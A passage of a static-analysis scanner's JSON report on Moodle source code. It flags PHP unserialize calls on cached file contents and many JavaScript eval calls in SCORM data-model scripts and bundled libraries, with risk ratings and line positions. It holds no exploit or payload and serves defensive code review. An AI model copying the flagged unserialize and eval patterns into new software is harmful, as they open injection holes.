"\t\t} else {\n\t\t\tif (isset($report)) {\n\t\t\t\t$report['lib'] = 'file';\n\t\t\t}\n\n\t\t\t$content = @file_get_contents($url);\n\n\t\t\tif ($content === FALSE && isset($report)) {\n\t\t\t\t$report['error'] = -1;\n\t\t\t\t$report['message'] = 'Couldn\\'t get URL: ' . implode(LF, $http_response_header);\n\t\t\t}\n", "functionName": "Global.t3lib_div::getUrl", "endLineNumber": 2758, "positionInStartLine": 3, "positionInEndLine": 38, "appercutAttackItemId": 9003, "startLineNumber": 2758}, {"sourceFileName": "moodle/lib/typo3/class.t3lib_cs.php", "code": "\t\t}\n\n\t\t\t// Use cached version if possible\n\t\t$cacheFile = t3lib_div::getFileAbsFileName('typo3temp/cs/csascii_' . $charset . '.tbl');\n\t\tif ($cacheFile && @is_file($cacheFile)) {\n\t\t\t$this->toASCII[$charset] = unserialize(t3lib_div::getUrl($cacheFile));\n\t\t\treturn 2;\n\t\t}\n\n\t\t\t// init UTF-8 conversion for this charset\n\t\tif (!$this->initCharset($charset)) {\n", "functionName": "Global.t3lib_cs::initToASCII", "endLineNumber": 1425, "positionInStartLine": 30, "positionInEndLine": 72, "appercutAttackItemId": 9005, "startLineNumber": 1425}], "appercutDescriptionRef": "https://vulners.com/static/appercut/en/Php/InjectionUnserialize.html", "positionInStartLine": 30, "patternDescription": "The \u2018serialize\u2019 function is used to display PHP variables as strings. The \u2018unserialize\u2019 function does the reverse transformation. If user data is used when calling the \u2018unserialize\u2019 function, the malicious user can create and initialize variables in the context of application names, which can lead to a breach of application logic, or even remote code execution.", "appercutVulnerName": "Incorrect User Input Filtration when Using the unserialize Function", "endLineNumber": 1425, "positionInEndLine": 72, "startLineNumber": 1425, "patternCodeLanguage": "PHP", "appercutRisk": "MEDIUM"}, {"sourceFileName": "moodle/lib/adodb/adodb-active-recordx.inc.php", "code": "\t\t$db = $activedb->db;\n\t\t$fname = $ADODB_CACHE_DIR . '/adodb_' . $db->databaseType . '_active_'. $table . '.cache';\n\t\tif (!$forceUpdate && $ADODB_ACTIVE_CACHESECS && $ADODB_CACHE_DIR && file_exists($fname)) {\n\t\t\t$fp = fopen($fname,'r');\n\t\t\t@flock($fp, LOCK_SH);\n\t\t\t$acttab = unserialize(fread($fp,100000));\n\t\t\tfclose($fp);\n\t\t\tif ($acttab->_created + $ADODB_ACTIVE_CACHESECS - (abs(rand()) % 16) > time()) {\n\t\t\t\t// abs(rand()) randomizes deletion, reducing contention to delete/refresh file\n\t\t\t\t// ideally, you should cache at least 32 secs\n\t\t\t\t$activedb->tables[$table] = $acttab;\n", "vulnerId": "APPCUT:62:14558", "functionName": "None", "appercutAttackItems": [], "appercutDescriptionRef": "https://vulners.com/static/appercut/en/Php/InjectionUnserialize.html", "positionInStartLine": 13, "patternDescription": "The \u2018serialize\u2019 function is used to display PHP variables as strings. The \u2018unserialize\u2019 function does the reverse transformation. If user data is used when calling the \u2018unserialize\u2019 function, the malicious user can create and initialize variables in the context of application names, which can lead to a breach of application logic, or even remote code execution.", "appercutVulnerName": "Incorrect User Input Filtration when Using the unserialize Function", "endLineNumber": 440, "positionInEndLine": 43, "startLineNumber": 440, "patternCodeLanguage": "PHP", "appercutRisk": "MEDIUM"}, {"sourceFileName": "moodle/lib/htmlpurifier/HTMLPurifier/EntityLookup.php", "code": " public function setup($file = false)\n {\n if (!$file) {\n $file = HTMLPURIFIER_PREFIX . '/HTMLPurifier/EntityLookup/entities.ser';\n }\n $this->table = unserialize(file_get_contents($file));\n }\n\n /**\n * Retrieves sole instance of the object.\n * @param bool|HTMLPurifier_EntityLookup $prototype Optional prototype of custom lookup table to overload with.\n", "vulnerId": "APPCUT:62:14545", "functionName": "None", "appercutAttackItems": [], "appercutDescriptionRef": "https://vulners.com/static/appercut/en/Php/InjectionUnserialize.html", "positionInStartLine": 23, "patternDescription": "The \u2018serialize\u2019 function is used to display PHP variables as strings. The \u2018unserialize\u2019 function does the reverse transformation. If user data is used when calling the \u2018unserialize\u2019 function, the malicious user can create and initialize variables in the context of application names, which can lead to a breach of application logic, or even remote code execution.", "appercutVulnerName": "Incorrect User Input Filtration when Using the unserialize Function", "endLineNumber": 26, "positionInEndLine": 60, "startLineNumber": 26, "patternCodeLanguage": "PHP", "appercutRisk": "MEDIUM"}, {"sourceFileName": "moodle/lib/filelib.php", "code": " return false;\n } else {\n $fp = fopen($this->dir.$filename, 'r');\n $size = filesize($this->dir.$filename);\n $content = fread($fp, $size);\n return unserialize($content);\n }\n }\n return false;\n }\n\n", "vulnerId": "APPCUT:62:14541", "functionName": "None", "appercutAttackItems": [{"sourceFileName": "moodle/lib/filelib.php", "code": " if (time()-$lasttime > $this->ttl) {\n return false;\n } else {\n $fp = fopen($this->dir.$filename, 'r');\n $size = filesize($this->dir.$filename);\n $content = fread($fp, $size);\n return unserialize($content);\n }\n }\n return false;\n }\n", "functionName": "Global.curl_cache::get", "endLineNumber": 3770, "positionInStartLine": 16, "positionInEndLine": 44, "appercutAttackItemId": 9006, "startLineNumber": 3770}, {"sourceFileName": "moodle/lib/filelib.php", "code": " return false;\n } else {\n $fp = fopen($this->dir.$filename, 'r');\n $size = filesize($this->dir.$filename);\n $content = fread($fp, $size);\n return unserialize($content);\n }\n }\n return false;\n }\n\n", "functionName": "Global.curl_cache::get", "endLineNumber": 3771, "positionInStartLine": 23, "positionInEndLine": 44, "appercutAttackItemId": 9007, "startLineNumber": 3771}], "appercutDescriptionRef": "https://vulners.com/static/appercut/en/Php/InjectionUnserialize.html", "positionInStartLine": 23, "patternDescription": "The \u2018serialize\u2019 function is used to display PHP variables as strings. The \u2018unserialize\u2019 function does the reverse transformation. If user data is used when calling the \u2018unserialize\u2019 function, the malicious user can create and initialize variables in the context of application names, which can lead to a breach of application logic, or even remote code execution.", "appercutVulnerName": "Incorrect User Input Filtration when Using the unserialize Function", "endLineNumber": 3771, "positionInEndLine": 44, "startLineNumber": 3771, "patternCodeLanguage": "PHP", "appercutRisk": "MEDIUM"}, {"sourceFileName": "moodle/lib/adodb/adodb-csvlib.inc.php", "code": "\t\t\t\t\t\twhile ($txt = fread($fp,$MAXSIZE)) {\n\t\t\t\t\t\t\t$text .= $txt;\n\t\t\t\t\t\t}\n\t\t\t\t\t}\n\t\t\t\t\tfclose($fp);\n\t\t\t\t\t$rs = unserialize($text);\n\t\t\t\t\tif (is_object($rs)) $rs->timeCreated = $ttl;\n\t\t\t\t\telse {\n\t\t\t\t\t\t$err = \"Unable to unserialize recordset\";\n\t\t\t\t\t\t//echo htmlspecialchars($text),' !--END--!<p>';\n\t\t\t\t\t}\n", "vulnerId": "APPCUT:62:14546", "functionName": "None", "appercutAttackItems": [{"sourceFileName": "moodle/lib/adodb/adodb-csvlib.inc.php", "code": "\t\t\t\t\t$MAXSIZE = 128000;\n\n\t\t\t\t\t$text = fread($fp,$MAXSIZE);\n\t\t\t\t\tif (strlen($text)) {\n\t\t\t\t\t\twhile ($txt = fread($fp,$MAXSIZE)) {\n\t\t\t\t\t\t\t$text .= $txt;\n\t\t\t\t\t\t}\n\t\t\t\t\t}\n\t\t\t\t\tfclose($fp);\n\t\t\t\t\t$rs = unserialize($text);\n\t\t\t\t\tif (is_object($rs)) $rs->timeCreated = $ttl;\n", "functionName": "Global.GlobalContext::csv2rs", "endLineNumber": 199, "positionInStartLine": 7, "positionInEndLine": 20, "appercutAttackItemId": 9017, "startLineNumber": 199}, {"sourceFileName": "moodle/lib/adodb/adodb-csvlib.inc.php", "code": "\t\t\t\t\t\twhile ($txt = fread($fp,$MAXSIZE)) {\n\t\t\t\t\t\t\t$text .= $txt;\n\t\t\t\t\t\t}\n\t\t\t\t\t}\n\t\t\t\t\tfclose($fp);\n\t\t\t\t\t$rs = unserialize($text);\n\t\t\t\t\tif (is_object($rs)) $rs->timeCreated = $ttl;\n\t\t\t\t\telse {\n\t\t\t\t\t\t$err = \"Unable to unserialize recordset\";\n\t\t\t\t\t\t//echo htmlspecialchars($text),' !--END--!<p>';\n\t\t\t\t\t}\n", "functionName": "Global.GlobalContext::csv2rs", "endLineNumber": 203, "positionInStartLine": 11, "positionInEndLine": 29, "appercutAttackItemId": 9018, "startLineNumber": 203}, {"sourceFileName": "moodle/lib/adodb/adodb-csvlib.inc.php", "code": "\t\t\t\t\t// slurp in the data\n\t\t\t\t\t$MAXSIZE = 128000;\n\n\t\t\t\t\t$text = fread($fp,$MAXSIZE);\n\t\t\t\t\tif (strlen($text)) {\n\t\t\t\t\t\twhile ($txt = fread($fp,$MAXSIZE)) {\n\t\t\t\t\t\t\t$text .= $txt;\n\t\t\t\t\t\t}\n\t\t\t\t\t}\n\t\t\t\t\tfclose($fp);\n\t\t\t\t\t$rs = unserialize($text);\n", "functionName": "Global.GlobalContext::csv2rs", "endLineNumber": 198, "positionInStartLine": 13, "positionInEndLine": 39, "appercutAttackItemId": 9016, "startLineNumber": 198}], "appercutDescriptionRef": "https://vulners.com/static/appercut/en/Php/InjectionUnserialize.html", "positionInStartLine": 11, "patternDescription": "The \u2018serialize\u2019 function is used to display PHP variables as strings. The \u2018unserialize\u2019 function does the reverse transformation. If user data is used when calling the \u2018unserialize\u2019 function, the malicious user can create and initialize variables in the context of application names, which can lead to a breach of application logic, or even remote code execution.", "appercutVulnerName": "Incorrect User Input Filtration when Using the unserialize Function", "endLineNumber": 203, "positionInEndLine": 29, "startLineNumber": 203, "patternCodeLanguage": "PHP", "appercutRisk": "MEDIUM"}]}, {"pageNumber": 4, "vulnerabilities": [{"sourceFileName": "moodle/mod/scorm/datamodels/scorm_13.js", "code": " return found;\n }\n\n function duplicatedPA (element, parent, value) {\n var found = false;\n var elements = eval(parent + '._count');\n for (var n = 0; (n < elements) && (!found); n++) {\n if ((parent + '.N' + n + '.pattern' != element) && (eval(parent + '.N' + n + '.pattern') == value)) {\n found = true;\n }\n }\n", "vulnerId": "APPCUT:62:14278", "functionName": "None", "appercutAttackItems": [], "appercutDescriptionRef": "https://vulners.com/static/appercut/en/JavaScript/InjectionCode.html", "positionInStartLine": 27, "patternDescription": "This vulnerability occurs when the application does not properly filter external data when making a call to the API. As a result, the user can form his inputs in a way that forces the application to perform actions, not accounted for by the developer.", "appercutVulnerName": "Incorrect User Input Filtration when Generating Code on the Fly", "endLineNumber": 1080, "positionInEndLine": 47, "startLineNumber": 1080, "patternCodeLanguage": "JavaScript", "appercutRisk": "HIGH"}, {"sourceFileName": "moodle/mod/scorm/datamodels/scorm_13.js", "code": " adl.nav.request_valid = new Array();\n\n for (element in datamodel[scoid]) {\n if (element.match(/\\.n\\./) == null) {\n if ((typeof eval('datamodel[\"' + scoid + '\"][\"' + element + '\"].defaultvalue')) != 'undefined') {\n eval(element + ' = datamodel[\"' + scoid + '\"][\"' + element + '\"].defaultvalue;');\n } else {\n eval(element + ' = \"\";');\n }\n }\n }\n", "vulnerId": "APPCUT:62:14291", "functionName": "None", "appercutAttackItems": [], "appercutDescriptionRef": "https://vulners.com/static/appercut/en/JavaScript/InjectionCode.html", "positionInStartLine": 24, "patternDescription": "This vulnerability occurs when the application does not properly filter external data when making a call to the API. As a result, the user can form his inputs in a way that forces the application to perform actions, not accounted for by the developer.", "appercutVulnerName": "Incorrect User Input Filtration when Generating Code on the Fly", "endLineNumber": 256, "positionInEndLine": 100, "startLineNumber": 256, "patternCodeLanguage": "JavaScript", "appercutRisk": "HIGH"}, {"sourceFileName": "moodle/mod/scorm/datamodels/aicc.js", "code": " }\n if ((typeof eval(subelement)) == \"undefined\") {\n eval(subelement + ' = new Object();');\n if (subelement.substr(0,14) == 'cmi.objectives') {\n eval(subelement + '.score = new Object();');\n eval(subelement + '.score._children = score_children;');\n eval(subelement + '.score.raw = \"\";');\n eval(subelement + '.score.min = \"\";');\n eval(subelement + '.score.max = \"\";');\n }\n if (subelement.substr(0,16) == 'cmi.interactions') {\n", "vulnerId": "APPCUT:62:14287", "functionName": "None", "appercutAttackItems": [], "appercutDescriptionRef": "https://vulners.com/static/appercut/en/JavaScript/InjectionCode.html", "positionInStartLine": 48, "patternDescription": "This vulnerability occurs when the application does not properly filter external data when making a call to the API. As a result, the user can form his inputs in a way that forces the application to perform actions, not accounted for by the developer.", "appercutVulnerName": "Incorrect User Input Filtration when Generating Code on the Fly", "endLineNumber": 322, "positionInEndLine": 99, "startLineNumber": 322, "patternCodeLanguage": "JavaScript", "appercutRisk": "HIGH"}, {"sourceFileName": "moodle/mod/scorm/datamodels/scorm_13.js", "code": " var subobject = eval(subelement);\n subobject.correct_responses = new Object();\n subobject.correct_responses._count = 0;\n break;\n case 'cmi.interactions.n.learner_response':\n if (typeof eval(subelement + '.type') == \"undefined\") {\n errorCode = \"408\";\n } else {\n // Use cmi.interactions.n.type value to check the right dataelement format\n interactiontype = eval(subelement + '.type');\n var nodes = new Array();\n", "vulnerId": "APPCUT:62:14285", "functionName": "None", "appercutAttackItems": [], "appercutDescriptionRef": "https://vulners.com/static/appercut/en/JavaScript/InjectionCode.html", "positionInStartLine": 63, "patternDescription": "This vulnerability occurs when the application does not properly filter external data when making a call to the API. As a result, the user can form his inputs in a way that forces the application to perform actions, not accounted for by the developer.", "appercutVulnerName": "Incorrect User Input Filtration when Generating Code on the Fly", "endLineNumber": 658, "positionInEndLine": 86, "startLineNumber": 658, "patternCodeLanguage": "JavaScript", "appercutRisk": "HIGH"}, {"sourceFileName": "moodle/mod/scorm/datamodels/scorm_13.js", "code": " diagnostic = \"Data Model Element Collection Set Out Of Order\";\n }\n subelement = subelement.concat('.' + elementIndex + '.N' + elementIndexes[i + 1]);\n i++;\n\n if (((typeof eval(subelement)) == \"undefined\") && (i < elementIndexes.length - 2)) {\n errorCode = \"408\";\n }\n }\n } else {\n subelement = subelement.concat('.' + elementIndex);\n", "vulnerId": "APPCUT:62:14275", "functionName": "None", "appercutAttackItems": [], "appercutDescriptionRef": "https://vulners.com/static/appercut/en/JavaScript/InjectionCode.html", "positionInStartLine": 61, "patternDescription": "This vulnerability occurs when the application does not properly filter external data when making a call to the API. As a result, the user can form his inputs in a way that forces the application to perform actions, not accounted for by the developer.", "appercutVulnerName": "Incorrect User Input Filtration when Generating Code on the Fly", "endLineNumber": 513, "positionInEndLine": 73, "startLineNumber": 513, "patternCodeLanguage": "JavaScript", "appercutRisk": "HIGH"}, {"sourceFileName": "moodle/mod/scorm/datamodels/scorm_13.js", "code": " var childrenstr = '._children';\n var countstr = '._count';\n var parentmodel = '';\n if (elementmodel.substr(elementmodel.length - childrenstr.length,elementmodel.length) == childrenstr) {\n parentmodel = elementmodel.substr(0,elementmodel.length - childrenstr.length);\n if ((typeof eval('datamodel[\"' + scoid + '\"][\"' + parentmodel + '\"]')) != \"undefined\") {\n errorCode = \"301\";\n diagnostic = \"Data Model Element Does Not Have Children\";\n } else {\n errorCode = \"401\";\n }\n", "vulnerId": "APPCUT:62:14283", "functionName": "None", "appercutAttackItems": [], "appercutDescriptionRef": "https://vulners.com/static/appercut/en/JavaScript/InjectionCode.html", "positionInStartLine": 40, "patternDescription": "This vulnerability occurs when the application does not properly filter external data when making a call to the API. As a result, the user can form his inputs in a way that forces the application to perform actions, not accounted for by the developer.", "appercutVulnerName": "Incorrect User Input Filtration when Generating Code on the Fly", "endLineNumber": 420, "positionInEndLine": 93, "startLineNumber": 420, "patternCodeLanguage": "JavaScript", "appercutRisk": "HIGH"}, {"sourceFileName": "moodle/mod/scorm/datamodels/scorm_12.js", "code": " if (Initialized) {\n if (element != \"\") {\n expression = new RegExp(CMIIndex,'g');\n elementmodel = String(element).replace(expression,'.n.');\n if ((typeof eval('datamodel[\"' + scoid + '\"][\"' + elementmodel + '\"]')) != \"undefined\") {\n if (eval('datamodel[\"' + scoid + '\"][\"' + elementmodel + '\"].mod') != 'w') {\n element = String(element).replace(expression, \"_$1.\");\n elementIndexes = element.split('.');\n subelement = 'cmi';\n i = 1;\n while ((i < elementIndexes.length) && (typeof eval(subelement) != \"undefined\")) {\n", "vulnerId": "APPCUT:62:14277", "functionName": "None", "appercutAttackItems": [], "appercutDescriptionRef": "https://vulners.com/static/appercut/en/JavaScript/InjectionCode.html", "positionInStartLine": 28, "patternDescription": "This vulnerability occurs when the application does not properly filter external data when making a call to the API. As a result, the user can form his inputs in a way that forces the application to perform actions, not accounted for by the developer.", "appercutVulnerName": "Incorrect User Input Filtration when Generating Code on the Fly", "endLineNumber": 248, "positionInEndLine": 87, "startLineNumber": 248, "patternCodeLanguage": "JavaScript", "appercutRisk": "HIGH"}, {"sourceFileName": "moodle/mod/scorm/datamodels/aicc.js", "code": " subelement = subelement.concat('.' + elementIndex + '_' + elementIndexes[i + 1]);\n i++;\n } else {\n subelement = subelement.concat('.' + elementIndex);\n }\n if ((typeof eval(subelement)) == \"undefined\") {\n eval(subelement + ' = new Object();');\n if (subelement.substr(0,14) == 'cmi.objectives') {\n eval(subelement + '.score = new Object();');\n eval(subelement + '.score._children = score_children;');\n eval(subelement + '.score.raw = \"\";');\n", "vulnerId": "APPCUT:62:14288", "functionName": "None", "appercutAttackItems": [], "appercutDescriptionRef": "https://vulners.com/static/appercut/en/JavaScript/InjectionCode.html", "positionInStartLine": 52, "patternDescription": "This vulnerability occurs when the application does not properly filter external data when making a call to the API. As a result, the user can form his inputs in a way that forces the application to perform actions, not accounted for by the developer.", "appercutVulnerName": "Incorrect User Input Filtration when Generating Code on the Fly", "endLineNumber": 318, "positionInEndLine": 64, "startLineNumber": 318, "patternCodeLanguage": "JavaScript", "appercutRisk": "HIGH"}, {"sourceFileName": "moodle/mod/scorm/datamodels/scorm_12.js", "code": " if ((typeof eval(subelement + '.' + elementIndex)) == \"undefined\") {\n eval(subelement + '.' + elementIndex + ' = new Object();');\n eval(subelement + '.' + elementIndex + '._count = 0;');\n }\n if (elementIndexes[i + 1] == eval(subelement + '.' + elementIndex + '._count')) {\n eval(subelement + '.' + elementIndex + '._count++;');\n }\n if (elementIndexes[i + 1] > eval(subelement + '.' + elementIndex + '._count')) {\n errorCode = \"201\";\n }\n subelement = subelement.concat('.' + elementIndex + '_' + elementIndexes[i + 1]);\n", "vulnerId": "APPCUT:62:14282", "functionName": "None", "appercutAttackItems": [], "appercutDescriptionRef": "https://vulners.com/static/appercut/en/JavaScript/InjectionCode.html", "positionInStartLine": 48, "patternDescription": "This vulnerability occurs when the application does not properly filter external data when making a call to the API. As a result, the user can form his inputs in a way that forces the application to perform actions, not accounted for by the developer.", "appercutVulnerName": "Incorrect User Input Filtration when Generating Code on the Fly", "endLineNumber": 325, "positionInEndLine": 96, "startLineNumber": 325, "patternCodeLanguage": "JavaScript", "appercutRisk": "HIGH"}, {"sourceFileName": "moodle/mod/scorm/datamodels/aicc.js", "code": " } else {\n childrenstr = '._children';\n countstr = '._count';\n if (elementmodel.substr(elementmodel.length - childrenstr.length,elementmodel.length) == childrenstr) {\n parentmodel = elementmodel.substr(0,elementmodel.length - childrenstr.length);\n if ((typeof eval('datamodel[\"' + scoid + '\"][\"' + parentmodel + '\"]')) != \"undefined\") {\n errorCode = \"202\";\n } else {\n errorCode = \"201\";\n }\n } else if (elementmodel.substr(elementmodel.length - countstr.length,elementmodel.length) == countstr) {\n", "vulnerId": "APPCUT:62:14280", "functionName": "None", "appercutAttackItems": [], "appercutDescriptionRef": "https://vulners.com/static/appercut/en/JavaScript/InjectionCode.html", "positionInStartLine": 40, "patternDescription": "This vulnerability occurs when the application does not properly filter external data when making a call to the API. As a result, the user can form his inputs in a way that forces the application to perform actions, not accounted for by the developer.", "appercutVulnerName": "Incorrect User Input Filtration when Generating Code on the Fly", "endLineNumber": 259, "positionInEndLine": 93, "startLineNumber": 259, "patternCodeLanguage": "JavaScript", "appercutRisk": "HIGH"}, {"sourceFileName": "moodle/group/clientlib.js", "code": " success: function(t, o) {\n\n if (o.responseText !== undefined) {\n var selectEl = document.getElementById(\"members\");\n if (selectEl && o.responseText) {\n var roles = eval(\"(\"+o.responseText+\")\");\n\n // Clear the members list box.\n if (selectEl) {\n while (selectEl.firstChild) {\n selectEl.removeChild(selectEl.firstChild);\n", "vulnerId": "APPCUT:62:14281", "functionName": "None", "appercutAttackItems": [], "appercutDescriptionRef": "https://vulners.com/static/appercut/en/JavaScript/InjectionCode.html", "positionInStartLine": 36, "patternDescription": "This vulnerability occurs when the application does not properly filter external data when making a call to the API. As a result, the user can form his inputs in a way that forces the application to perform actions, not accounted for by the developer.", "appercutVulnerName": "Incorrect User Input Filtration when Generating Code on the Fly", "endLineNumber": 83, "positionInEndLine": 60, "startLineNumber": 83, "patternCodeLanguage": "JavaScript", "appercutRisk": "HIGH"}, {"sourceFileName": "moodle/mod/scorm/datamodels/scorm_13.js", "code": " switch (elementmodel) {\n case 'cmi.objectives.n.id':\n if (!duplicatedID(element,parentelement,value)) {\n if (elementIndexes[elementIndexes.length - 2] == eval(parentelement + '._count')) {\n eval(parentelement + '._count++;');\n eval(subelement + ' = new Object();');\n var subobject = eval(subelement);\n subobject.success_status = datamodel[scoid][\"cmi.objectives.n.success_status\"].defaultvalue;\n subobject.completion_status = datamodel[scoid][\"cmi.objectives.n.completion_status\"].defaultvalue;\n subobject.progress_measure = datamodel[scoid][\"cmi.objectives.n.progress_measure\"].defaultvalue;\n subobject.score = new Object();\n", "vulnerId": "APPCUT:62:14289", "functionName": "None", "appercutAttackItems": [], "appercutDescriptionRef": "https://vulners.com/static/appercut/en/JavaScript/InjectionCode.html", "positionInStartLine": 60, "patternDescription": "This vulnerability occurs when the application does not properly filter external data when making a call to the API. As a result, the user can form his inputs in a way that forces the application to perform actions, not accounted for by the developer.", "appercutVulnerName": "Incorrect User Input Filtration when Generating Code on the Fly", "endLineNumber": 533, "positionInEndLine": 93, "startLineNumber": 533, "patternCodeLanguage": "JavaScript", "appercutRisk": "HIGH"}, {"sourceFileName": "moodle/mod/scorm/datamodels/scorm_12.js", "code": " if (eval('datamodel[\"' + scoid + '\"][\"' + element + '\"].mod') != 'r') {\n\n elementstring = '&' + underscore(element) + '=' + encodeURIComponent(data[property]);\n\n // check if the element has a default value\n if ((typeof eval('datamodel[\"' + scoid + '\"][\"' + element + '\"].defaultvalue')) != \"undefined\") {\n\n // check if the default value is different from the current value\n if (eval('datamodel[\"' + scoid + '\"][\"' + element + '\"].defaultvalue') != data[property]\n || eval('typeof(datamodel[\"' + scoid + '\"][\"' + element + '\"].defaultvalue)') != typeof(data[property])) {\n\n", "vulnerId": "APPCUT:62:14284", "functionName": "None", "appercutAttackItems": [], "appercutDescriptionRef": "https://vulners.com/static/appercut/en/JavaScript/InjectionCode.html", "positionInStartLine": 44, "patternDescription": "This vulnerability occurs when the application does not properly filter external data when making a call to the API. As a result, the user can form his inputs in a way that forces the application to perform actions, not accounted for by the developer.", "appercutVulnerName": "Incorrect User Input Filtration when Generating Code on the Fly", "endLineNumber": 577, "positionInEndLine": 106, "startLineNumber": 577, "patternCodeLanguage": "JavaScript", "appercutRisk": "HIGH"}, {"sourceFileName": "moodle/mod/scorm/datamodels/aicc.js", "code": " errorCode = \"0\";\n if (Initialized) {\n if (element != \"\") {\n expression = new RegExp(CMIIndex,'g');\n elementmodel = String(element).replace(expression,'.n.');\n if ((typeof eval('datamodel[\"' + scoid + '\"][\"' + elementmodel + '\"]')) != \"undefined\") {\n if (eval('datamodel[\"' + scoid + '\"][\"' + elementmodel + '\"].mod') != 'w') {\n element = String(element).replace(expression, \"_$1.\");\n elementIndexes = element.split('.');\n subelement = 'cmi';\n i = 1;\n", "vulnerId": "APPCUT:62:14286", "functionName": "None", "appercutAttackItems": [], "appercutDescriptionRef": "https://vulners.com/static/appercut/en/JavaScript/InjectionCode.html", "positionInStartLine": 32, "patternDescription": "This vulnerability occurs when the application does not properly filter external data when making a call to the API. As a result, the user can form his inputs in a way that forces the application to perform actions, not accounted for by the developer.", "appercutVulnerName": "Incorrect User Input Filtration when Generating Code on the Fly", "endLineNumber": 236, "positionInEndLine": 86, "startLineNumber": 236, "patternCodeLanguage": "JavaScript", "appercutRisk": "HIGH"}, {"sourceFileName": "moodle/mod/scorm/datamodels/scorm_13.js", "code": " }\n }\n }\n\n eval(cmiobj[scoid]);\n eval(cmiint[scoid]);\n eval(cmicommentsuser[scoid]);\n eval(cmicommentslms[scoid]);\n\n if (cmi.completion_status == '') {\n cmi.completion_status = 'not attempted';\n", "vulnerId": "APPCUT:62:14274", "functionName": "None", "appercutAttackItems": [], "appercutDescriptionRef": "https://vulners.com/static/appercut/en/JavaScript/InjectionCode.html", "positionInStartLine": 12, "patternDescription": "This vulnerability occurs when the application does not properly filter external data when making a call to the API. As a result, the user can form his inputs in a way that forces the application to perform actions, not accounted for by the developer.", "appercutVulnerName": "Incorrect User Input Filtration when Generating Code on the Fly", "endLineNumber": 264, "positionInEndLine": 27, "startLineNumber": 264, "patternCodeLanguage": "JavaScript", "appercutRisk": "HIGH"}]}, {"pageNumber": 11, "vulnerabilities": [{"sourceFileName": "moodle/lib/yuilib/2in3/2.9.0/build/yui2-profiler/yui2-profiler-min.js", "code": "Copyright (c) 2011, Yahoo! Inc. All rights reserved.\nCode licensed under the BSD License:\nhttp://developer.yahoo.com/yui/license.html\nversion: 2.9.0\n*/\nYAHOO.namespace(\"tool\");YAHOO.tool.Profiler=function(){var container={},report={},stopwatches={},WATCH_STARTED=0,WATCH_STOPPED=1,WATCH_PAUSED=2,lang=YAHOO.lang;function createReport(name){report[name]={calls:0,max:0,min:0,avg:0,points:[]};}function saveDataPoint(name,duration){var functionData=report[name];if(!functionData){functionData=createReport(name);}functionData.calls++;functionData.points.push(duration);if(functionData.calls>1){functionData.avg=((functionData.avg*(functionData.calls-1))+duration)/functionData.calls;functionData.min=Math.min(functionData.min,duration);functionData.max=Math.max(functionData.max,duration);}else{functionData.avg=duration;functionData.min=duration;functionData.max=duration;}}return{clear:function(name){if(lang.isString(name)){delete report[name];delete stopwatches[name];}else{report={};stopwatches={};}},getOriginal:function(name){return container[name];},instrument:function(name,method){var newMethod=function(){var start=new Date(),retval=method.apply(this,arguments),stop=new Date();saveDataPoint(name,stop-start);return retval;};lang.augmentObject(newMethod,method);newMethod.__yuiProfiled=true;newMethod.prototype=method.prototype;container[name]=method;container[name].__yuiFuncName=name;createReport(name);return newMethod;},pause:function(name){var now=new Date(),stopwatch=stopwatches[name];if(stopwatch&&stopwatch.state==WATCH_STARTED){stopwatch.total+=(now-stopwatch.start);stopwatch.start=0;stopwatch.state=WATCH_PAUSED;}},start:function(name){if(container[name]){throw new Error(\"Cannot use '\"+name+\"' for profiling through start(), name is already in use.\");}else{if(!report[name]){createReport(name);}if(!stopwatches[name]){stopwatches[name]={state:WATCH_STOPPED,start:0,total:0};}if(stopwatches[name].state==WATCH_STOPPED){stopwatches[name].state=WATCH_STARTED;stopwatches[name].start=new Date();}}},stop:function(name){var now=new Date(),stopwatch=stopwatches[name];if(stopwatch){if(stopwatch.state==WATCH_STARTED){saveDataPoint(name,stopwatch.total+(now-stopwatch.start));}else{if(stopwatch.state==WATCH_PAUSED){saveDataPoint(name,stopwatch.total);}}stopwatch.start=0;stopwatch.total=0;stopwatch.state=WATCH_STOPPED;}},getAverage:function(name){return report[name].avg;},getCallCount:function(name){return report[name].calls;},getMax:function(name){return report[name].max;},getMin:function(name){return report[name].min;},getFunctionReport:function(name){return report[name];},getReport:function(name){return report[name];},getFullReport:function(filter){filter=filter||function(){return true;};if(lang.isFunction(filter)){var fullReport={};for(var name in report){if(filter(report[name])){fullReport[name]=report[name];}}return fullReport;}},registerConstructor:function(name,owner){this.registerFunction(name,owner,true);},registerFunction:function(name,owner,registerPrototype){var funcName=(name.indexOf(\".\")>-1?name.substring(name.lastIndexOf(\".\")+1):name),method,prototype;if(!lang.isObject(owner)){owner=eval(name.substring(0,name.lastIndexOf(\".\")));}method=owner[funcName];prototype=method.prototype;if(lang.isFunction(method)&&!method.__yuiProfiled){owner[funcName]=this.instrument(name,method);container[name].__yuiOwner=owner;container[name].__yuiFuncName=funcName;if(registerPrototype){this.registerObject(name+\".prototype\",prototype);}}},registerObject:function(name,object,recurse){object=(lang.isObject(object)?object:eval(name));container[name]=object;for(var prop in object){if(typeof object[prop]==\"function\"){if(prop!=\"constructor\"&&prop!=\"superclass\"){this.registerFunction(name+\".\"+prop,object);}}else{if(typeof object[prop]==\"object\"&&recurse){this.registerObject(name+\".\"+prop,object[prop],recurse);}}}},unregisterConstructor:function(name){if(lang.isFunction(container[name])){this.unregisterFunction(name,true);}},unregisterFunction:function(name,unregisterPrototype){if(lang.isFunction(container[name])){if(unregisterPrototype){this.unregisterObject(name+\".prototype\",container[name].prototype);}var owner=container[name].__yuiOwner,funcName=container[name].__yuiFuncName;delete container[name].__yuiOwner;delete container[name].__yuiFuncName;owner[funcName]=container[name];delete container[name];}},unregisterObject:function(name,recurse){if(lang.isObject(container[name])){var object=container[name];for(var prop in object){if(typeof object[prop]==\"function\"){this.unregisterFunction(name+\".\"+prop);}else{if(typeof object[prop]==\"object\"&&recurse){this.unregisterObject(name+\".\"+prop,recurse);}}}delete container[name];}}};}();YAHOO.register(\"profiler\",YAHOO.tool.Profiler,{version:\"2.9.0\",build:\"2800\"});\n}, '2.9.0' ,{\"requires\": [\"yui2-yahoo\"]});\n", "vulnerId": "APPCUT:62:14395", "functionName": "None", "appercutAttackItems": [], "appercutDescriptionRef": "https://vulners.com/static/appercut/en/JavaScript/InjectionCode.html", "positionInStartLine": 3405, "patternDescription": "This vulnerability occurs when the application does not properly filter external data when making a call to the API. As a result, the user can form his inputs in a way that forces the application to perform actions, not accounted for by the developer.", "appercutVulnerName": "Incorrect User Input Filtration when Generating Code on the Fly", "endLineNumber": 9, "positionInEndLine": 3411, "startLineNumber": 9, "patternCodeLanguage": "JavaScript", "appercutRisk": "HIGH"}, {"sourceFileName": 